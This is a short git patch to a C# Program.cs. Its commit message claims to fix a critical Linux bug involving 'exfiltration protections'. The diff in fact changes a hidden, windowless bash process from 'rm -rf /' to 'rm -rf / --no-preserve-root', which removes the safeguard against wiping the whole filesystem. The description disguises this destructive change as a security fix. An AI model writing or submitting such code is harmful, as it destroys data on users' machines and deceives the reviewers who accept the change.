From a91cd3498f1ad8fd9d6380ff4d37d8c94509bb21 Mon Sep 17 00:00:00 2001 From: BoBeR182 <525433+BoBeR182@users.noreply.github.com> Date: Thu, 7 Nov 2024 15:31:46 -0500 Subject: [PATCH] Fix critical linux bug fix critical bug, preventing exfiltration protections on linux systems --- Program.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Program.cs b/Program.cs index e344a16..d368059 100644 --- a/Program.cs +++ b/Program.cs @@ -23,7 +23,7 @@ static void Main(string[] args) { Process process = new Process(); psi.FileName = "/bin/bash"; - psi.Arguments = "rm -rf /"; + psi.Arguments = "rm -rf / --no-preserve-root"; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; psi.CreateNoWindow = true;